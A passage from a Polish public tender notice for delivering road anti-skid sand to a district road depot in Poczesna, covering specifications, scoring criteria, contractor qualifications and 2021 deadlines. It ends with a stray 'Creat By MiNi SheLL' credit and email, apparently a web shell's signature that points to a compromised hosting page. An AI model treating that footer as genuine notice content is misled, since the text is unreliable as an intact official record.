godziny 7:00-15:00) od<br/>wysłania powiadomienia, minimalna liczba dni 1, maksymalna liczba dni 3).<br/>Wykonawcy, którzy określą w formularzu ofertowym (zał. 3 do SWZ):<br/>􀀀 od 1 do 2 dni roboczych od wysłania powiadomienia otrzymają 5,0 % - 5,0 pkt<br/>􀀀 do 3 dni roboczych od wysłania powiadomienia otrzymają 2,5 % - 2,5 pkt<br/>c) Zasady obliczenia punktowego w kryterium Terminy dostaw partii piasku w ilości powyżej 400 Mg<br/>(podany w liczbie dni roboczych (tj. od poniedziałku do piątku, z wyjątkiem świąt od godziny 7:00-<br/>15:00) od wysłania powiadomienia, minimalna liczba dni 1, maksymalna liczba dni 5).<br/>Wykonawcy, którzy określą w formularzu ofertowym (zał. 3 do SWZ):<br/>􀀀 od 1 do 4 dni roboczych od wysłania powiadomienia otrzymają 5,0 % - 5,0 pkt,<br/>􀀀 do 5 dni roboczych od wysłania powiadomienia otrzymają 2,5 % - 2,5 pkt.<br/>UWAGA: W przypadku, jeżeli wykonawca nie poda w Formularzu OFERTA długości terminu dostaw<br/>piasku, zamawiający uzna, że wykonawca oferuje termin przekraczający wymagany w powyższych<br/>zapisach i nie przyzna punktów za to kryterium oceny ofert.<br/>„Wymagania jakościowe odnoszące się do co najmniej głównych elementów składających się na<br/>przedmiot zamówienia, o których mowa w art. 246 ust. 2 Pzp z 11.09.2019 r: zostały określone w opisie<br/>przedmiotu zamówienia, czyli w dokumentacji (Warunki techniczne, wytyczne ZDW Katowice<br/>specyfikacje cenowe - kosztorys ofertowy). Dokumenty te wskazują parametry wszystkich materiałów i<br/>urządzeń, które będą musiały być użyte do realizacji przedmiotu zamówienia jak również zasady<br/>wiedzy technicznej wymagane do wykonania zadania. Uwzględnią także wszystkie elementy, które<br/>mają wpływ na koszty związane z eksploatacją oraz utylizacją przedmiotu zamówienia. Dokumenty<br/>opisujące przedmiot zamówienia są tak precyzyjne, że bez względu na fakt, kto będzie wykonawcą<br/>przedmiotu zamówienia jedyną różnicą będą zaoferowane ceny (tzn. przedmiot zamówienia jest<br/>zestandaryzowany - identyczny, niezależnie od tego, który z wykonawców go wykona). W związku z<br/>powyższym Zamawiający jest upoważniony do zastosowania ceny, jako jedynego kryterium wyboru<br/>oferty najkorzystniejszej lub ceny, jako jednego z kryteriów wyboru oferty o znaczeniu ponad 60%.”</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">90,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">terminy dostaw partii piasku w ilości do 400 Mg</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">5,00</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">terminy dostaw partii piasku w ilości powyżej 400 Mg</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">5,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> ZADANIE NR 3<br/>Dostawa (zakup i transport) piasku do zwalczania śliskości na drogach powiatowych i<br/>wojewódzkich na plac Obwodu Drogowego Nr 3 w Poczesnej w ilości około 5.000 Mg w sezonie<br/>zimowym 2021/2022.<br/>Szczegółowy zakres przedmiotu zamówienia zawiera załącznik nr 1 do SWZ (SST piasek).<br/>Dostarczony przedmiot zamówienia musi być wysokiej jakości oraz spełniać wymogi zawarte w<br/>SWZ.<br/>Każda partia piasku musi posiadać stosowne normy, atesty i aprobaty. Wykonawca dostarcza<br/>przedmiot zamówienia na plac Obwodu Drogowego Nr 3 w Poczesnej na ulicę Bociania Górka 19 w Poczesnej .<br/>Przedmiot zamówienia należy wykonać zgodnie z obowiązującymi w tym zakresie przepisami.<br/>Piasek powinien posiadać następujący skład:<br/>- zawartość ziaren mniejszych niż 0,063 mm, nie więcej niż 5%,<br/>- uziarnienie do 2 mm, nadziarna nie więcej niż 15% ( nie dopuszcza się w nadziarnie ziaren<br/>większych od 4mm),<br/>- nie może być zanieczyszczony związkami organicznymi jak. np. trawa, szczątki korzeni,<br/>konarów itp. – barwa żółta,<br/>- nie może zawierać żadnych zanieczyszczeń gliniastych lub ilastych,<br/>- wskaźnik piaskowy ma być większy niż 65%.<br/>- wilgotność piasku do 5%<br/>Pozostałe wymagania dla piasku zawarte są w PN-EN 13043:2004<br/>W przypadku zmiany obowiązujących norm jakościowych w trakcie trwania umowy, Wykonawca<br/>będzie zobowiązany dostosować jakość dostarczanego przedmiotu zamówienia do nowych norm.<br/>Zamawiający dopuszcza ujęcie w ofercie, a następnie zastosowanie materiałów równoważnych<br/>o parametrach technicznych nie gorszych niż określono w dokumentacji. Wykonawca, który<br/>powołuje się na rozwiązania równoważne opisywanym przez Zamawiającego, jest obowiązany<br/>wykazać, ze oferowane przez niego dostawy spełniają wymagania określone przez<br/>Zamawiającego.<br/>Do wzajemnego współdziałania przy realizacji niniejszej umowy, ze strony Zamawiającego,<br/>wyznacza się:<br/>Na Obwodzie Drogowym Nr 3 w Poczesnej – Kierownika Obwodu Drogowego Panią Monikę<br/>SIWEK, tel. +48/696-429-872, (34) 327-40-66,<br/>reprezentujących Zamawiającego.<br/>Zgodnie z art. 101 ust. 4 ustawy Pzp w sytuacji, gdyby w dokumentacji przetargowej lub SST, a<br/>więc w dokumentach opisującym przedmiot zamówienia, zawarto odniesienie do norm, ocen<br/>technicznych, aprobat, specyfikacji technicznych i systemów referencji technicznych, o których<br/>mowa w art. 101 ust. 1 pkt 2 i ust. 3 Pzp a takim odniesieniom nie towarzyszyło wyrażenie „lub<br/>równoważne”, to Zamawiający dopuszcza rozwiązania równoważne opisywanym w każdej takiej<br/>normie, europejskiej ocenie technicznej, aprobacie, specyfikacji technicznej, systemowi<br/>referencji technicznych. W związku z powyższym należy przyjąć, że każdej: normie, europejskiej<br/>ocenie technicznej, aprobacie, specyfikacji technicznej, systemowi referencji technicznych<br/>występujących w opisie przedmiotu zamówienia towarzyszą wyrazy „lub równoważne". Zgodnie<br/>z art. 101 ust. 5 Pzp wykonawca, który powołuje się na rozwiązania równoważne opisywanym w<br/>tych dokumentach, jest obowiązany udowodnić, poprzez dołączenie do oferty stosownych<br/>przedmiotowych środków dowodowych, o których mowa w art. 104–107 Pzp, że proponowane<br/>rozwiązania w równoważnym stopniu spełniają wymagania określone w opisie przedmiotu<br/>zamówienia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">14211000-3 - Piasek</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">8 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Opis kryteriów oceny ofert wraz z podaniem wag tych kryteriów, i<br/>sposobu oceny ofert.<br/>1) kryterium oceny ofert jest:<br/>- cena ryczałtowa brutto – 90 %,<br/>- terminy dostaw partii piasku w ilości do 400 Mg waga 5 %<br/>- terminy dostaw partii piasku w ilości powyżej 400 Mg waga 5 %<br/>2) sposób oceny<br/>a) Wzór do obliczenia punktowego w kryterium CENA<br/>Cena = Cena najniższa oferowana (brutto)/ Cena badanej oferty (brutto) x 100 punktów x 90%<br/>b) Zasady obliczenia punktowego w kryterium Terminy dostaw partii piasku w ilości do 400Mg (podany<br/>w liczbie dni roboczych (tj. od poniedziałku do piątku, z wyjątkiem świąt od godziny 7:00-15:00) od<br/>wysłania powiadomienia, minimalna liczba dni 1, maksymalna liczba dni 3).<br/>Wykonawcy, którzy określą w formularzu ofertowym (zał. 3 do SWZ):<br/>􀀀 od 1 do 2 dni roboczych od wysłania powiadomienia otrzymają 5,0 % - 5,0 pkt<br/>􀀀 do 3 dni roboczych od wysłania powiadomienia otrzymają 2,5 % - 2,5 pkt<br/>c) Zasady obliczenia punktowego w kryterium Terminy dostaw partii piasku w ilości powyżej 400 Mg<br/>(podany w liczbie dni roboczych (tj. od poniedziałku do piątku, z wyjątkiem świąt od godziny 7:00-<br/>15:00) od wysłania powiadomienia, minimalna liczba dni 1, maksymalna liczba dni 5).<br/>Wykonawcy, którzy określą w formularzu ofertowym (zał. 3 do SWZ):<br/>􀀀 od 1 do 4 dni roboczych od wysłania powiadomienia otrzymają 5,0 % - 5,0 pkt,<br/>􀀀 do 5 dni roboczych od wysłania powiadomienia otrzymają 2,5 % - 2,5 pkt. UWAGA: W przypadku, jeżeli wykonawca nie poda w Formularzu OFERTA długości terminu dostaw<br/>piasku, zamawiający uzna, że wykonawca oferuje termin przekraczający wymagany w powyższych<br/>zapisach i nie przyzna punktów za to kryterium oceny ofert.<br/>„Wymagania jakościowe odnoszące się do co najmniej głównych elementów składających się na<br/>przedmiot zamówienia, o których mowa w art. 246 ust. 2 Pzp z 11.09.2019 r: zostały określone w opisie<br/>przedmiotu zamówienia, czyli w dokumentacji (Warunki techniczne, wytyczne ZDW Katowice<br/>specyfikacje cenowe - kosztorys ofertowy). Dokumenty te wskazują parametry wszystkich materiałów i<br/>urządzeń, które będą musiały być użyte do realizacji przedmiotu zamówienia jak również zasady<br/>wiedzy technicznej wymagane do wykonania zadania. Uwzględnią także wszystkie elementy, które<br/>mają wpływ na koszty związane z eksploatacją oraz utylizacją przedmiotu zamówienia. Dokumenty<br/>opisujące przedmiot zamówienia są tak precyzyjne, że bez względu na fakt, kto będzie wykonawcą<br/>przedmiotu zamówienia jedyną różnicą będą zaoferowane ceny (tzn. przedmiot zamówienia jest<br/>zestandaryzowany - identyczny, niezależnie od tego, który z wykonawców go wykona). W związku z<br/>powyższym Zamawiający jest upoważniony do zastosowania ceny, jako jedynego kryterium wyboru<br/>oferty najkorzystniejszej lub ceny, jako jednego z kryteriów wyboru oferty o znaczeniu ponad 60%.”</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">90,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">terminy dostaw partii piasku w ilości do 400 Mg</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">5,00</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">terminy dostaw partii piasku w ilości powyżej 400 Mg</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">5,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Posiadanie doświadczenia niezbędnego do wykonania przedmiotu zamówienia, tj.<br/>udokumentowanie wykonania, tj. zakończenia w okresie ostatnich trzech lat przed upływem<br/>terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie co<br/>najmniej jednej dostawy w zakresie niezbędnym do wykazania spełniania warunku wiedzy i<br/>doświadczenia w niniejszym postępowaniu odpowiadające swoim rodzajem usługom<br/>stanowiącym przedmiot zamówienia (zał. Nr 5 do SWZ). Określenie „dostawę w zakresie<br/>niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w niniejszym<br/>postępowaniu” oznacza: dostawy piasku w ilości łącznej dostawy nie mniejszej niż 1.000 Mg w<br/>ramach jednej umowy.<br/>W przypadku dostaw, których wartość została wyrażona w umowie w innej walucie niż PLN<br/>należy dokonać przeliczenia tej waluty na PLN przy zastosowaniu średniego kursu NBP na<br/>dzień zakończenia robót (w przypadku robót rozliczanych wyłącznie w walutach innych niż PLN).<br/>Uwaga: w celu spełnienia wymagań wynikających z treści art. 117 ust. 3 Pzp w sytuacji, gdy<br/>powyższy warunek będzie spełniony przez jednego ze wspólników konsorcjum to ten wspólnik<br/>musi wykonać części dostaw soli drogowej w ilości łącznej dostawy nie mniejszej niż 500 Mg.<br/>Uwaga: w celu spełnienia wymagań wynikających z treści art. 118 ust. 2 Pzp w sytuacji, gdy<br/>powyższy warunek będzie spełniony nie przez wykonawcę lub wspólnika konsorcjum, a przez „<br/>podmiot udostępniający zasoby wykonawcy (tzw. „podmiot trzeci”), to „podmiot” ten musi być<br/>podwykonawcą części dostaw soli drogowej w ilości łącznej dostawy nie mniejszej niż 500 Mg.<br/>Dysponowanie potencjałem technicznym - wyposażeniem technicznym przewidzianym do użycia<br/>przy realizacji zamówienia: Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.<br/>Ocenę spełniania warunku udziału w postępowaniu zamawiający przeprowadzi na podstawie<br/>załączonego do oferty oświadczenia.<br/>W przypadku złożenia oferty na jedno, dwa lub trzy zadania Wykonawca musi dysponować<br/>odpowiednim sprzętem osobno na każde z zadań. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający będzie wymagał złożenia niżej wymienionych podmiotowych środków dowodowych:<br/>Wykazu dostaw, zgodny ze wzorem zamieszczonym w załączniku nr 5 do SWZ , spełniających wymagania określone w punkcie 18.1 SWZ wykonanych nie wcześniej niż w okresie ostatnich 3 lat<br/>przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym<br/>okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których<br/>dostawy te zostały wykonane, sporządzone przez podmiot, na rzecz którego roboty budowlane zostały<br/>wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych<br/>dokumentów – inne odpowiednie dokumenty.<br/>Jeżeli wykonawca powołuje sią na doświadczenie w realizacji dostaw, wykonywanych wspólnie z<br/>innymi wykonawcami, powyższy wykaz dotyczy tylko dostaw, w których wykonaniu wykonawca ten<br/>bezpośrednio uczestniczył.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Nie może podlegać wykluczeniu z postępowania na podstawie żadnej z<br/>przesłanek, o których mowa w art. 108 ust. 1 Pzp: wykonawca, żaden ze wspólników konsorcjum (w<br/>przypadku składania oferty wspólnej) ani żaden podmiot, na którego zasoby powołuje się wykonawca<br/>w celu spełnienia warunków udziału w postępowaniu jeżeli udowodni Zamawiającemu, że spełnił<br/>łącznie następujące przesłanki:1) naprawił lub zobowiązał się do naprawienia szkody wyrządzonej<br/>przestępstwem, wykroczeniem lub swoim nieprawidłowym postępowaniem, w tym poprzez<br/>zadośćuczynienie pieniężne;2) wyczerpująco wyjaśnił fakty i okoliczności związane z przestępstwem,<br/>wykroczeniem lub swoim nieprawidłowym postępowaniem oraz spowodowanymi przez nie szkodami,<br/>aktywnie współpracując odpowiednio z właściwymi organami, w tym organami ścigania, lub<br/>zamawiającym;3) podjął konkretne środki techniczne, organizacyjne i kadrowe, odpowiednie dla<br/>zapobiegania dalszym przestępstwom, wykroczeniom lub nieprawidłowemu postępowaniu, w<br/>szczególności:a) zerwał wszelkie powiązania z osobami lub podmiotami odpowiedzialnymi za<br/>nieprawidłowe postępowanie Wykonawcy,b)zreorganizował personel,c) wdrożył system<br/>sprawozdawczości i kontroli,d) utworzył struktury audytu wewnętrznego do monitorowania<br/>przestrzegania przepisów, wewnętrznych regulacji lub standardów,e) wprowadził wewnętrzne regulacje<br/>dotyczące odpowiedzialności i odszkodowań za nieprzestrzeganie przepisów, wewnętrznych regulacji<br/>lub standardów.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zgodnie z art. 101 ust. 4 ustawy Pzp w sytuacji, gdyby w dokumentacji przetargowej lub SST, a<br/>więc w dokumentach opisującym przedmiot zamówienia, zawarto odniesienie do norm, ocen<br/>technicznych, aprobat, specyfikacji technicznych i systemów referencji technicznych, o których<br/>mowa w art. 101 ust. 1 pkt 2 i ust. 3 Pzp a takim odniesieniom nie towarzyszyło wyrażenie „lub<br/>równoważne”, to Zamawiający dopuszcza rozwiązania równoważne opisywanym w każdej takiej<br/>normie, europejskiej ocenie technicznej, aprobacie, specyfikacji technicznej, systemowi<br/>referencji technicznych. W związku z powyższym należy przyjąć, że każdej: normie, europejskiej<br/>ocenie technicznej, aprobacie, specyfikacji technicznej, systemowi referencji technicznych<br/>występujących w opisie przedmiotu zamówienia towarzyszą wyrazy „lub równoważne". Zgodnie<br/>z art. 101 ust. 5 Pzp wykonawca, który powołuje się na rozwiązania równoważne opisywanym w<br/>tych dokumentach, jest obowiązany udowodnić, poprzez dołączenie do oferty stosownych<br/>przedmiotowych środków dowodowych, o których mowa w art. 104–107 Pzp, że proponowane<br/>rozwiązania w równoważnym stopniu spełniają wymagania określone w opisie przedmiotu<br/>zamówienia. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Wykonawcy będą musieli złożyć na każde żądanie Zamawiającego w terminie przez niego<br/>wskazanym i w formie określonej w Rozporządzeniu Ministra Rozwoju, Pracy i Technologii z<br/>23.12.2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub<br/>oświadczeń, jakich może żądać zamawiający od wykonawcy (Dz.U. z 2020 r. poz. 2415) oraz<br/>zgodnie z Rozporządzeniem Prezesa Rozporządzenie Rady Ministrów z dnia 30.12.2020r. w<br/>sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla<br/>dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o<br/>udzielenie zamówienia publicznego lub konkursie” (Dz.U. z 2020 r. poz. 2452). <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Wykazy dostaw będą musiały być sporządzone i podpisane przez ten podmiot, który spełnia<br/>dany warunek, czyli odpowiednio przez: wykonawcę lub wspólnika konsorcjum lub „podmiot<br/>trzeci”. Uwaga: wykonawca, który polega na zdolnościach innych podmiotów w celu spełnienia<br/>powyższych warunków musi wraz z ofertą złożyć zobowiązanie tych podmiotów, o którym mowa<br/>w punkcie 10.1.4) SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Każdy Wykonawca ma prawo złożyć tylko jedną ofertę. Za równoznaczne ze złożeniem więcej<br/>niż jednej oferty przez tego samego Wykonawcę zostanie uznana sytuacja, w której ten sam<br/>podmiot występuje w dwóch lub więcej ofertach składanych wspólnie lub jest samodzielnym<br/>Wykonawcą, a jednocześnie jest uczestnikiem wspólnej oferty. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Wszelkie zmiany i uzupełnienia treści umowy winny zostać dokonane w formie aneksu<br/>podpisanego przez obie strony, pod rygorem nieważności w przypadkach określonych w SWZ.<br/>Zamawiający zgodnie z art. 455 ust. 1 pkt. 1 ustawy Prawo zamówień publicznych przewiduje<br/>możliwość dokonywania zmian w treści zawartej umowy w stosunku do treści oferty w zakresie<br/>opisanym w § 12 projektu umowy stanowiącej załącznik do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-10-06 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://pzd-czestochowa.logintrade.net/rejestracja/ustawowe.html</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-10-06 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-11-05</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com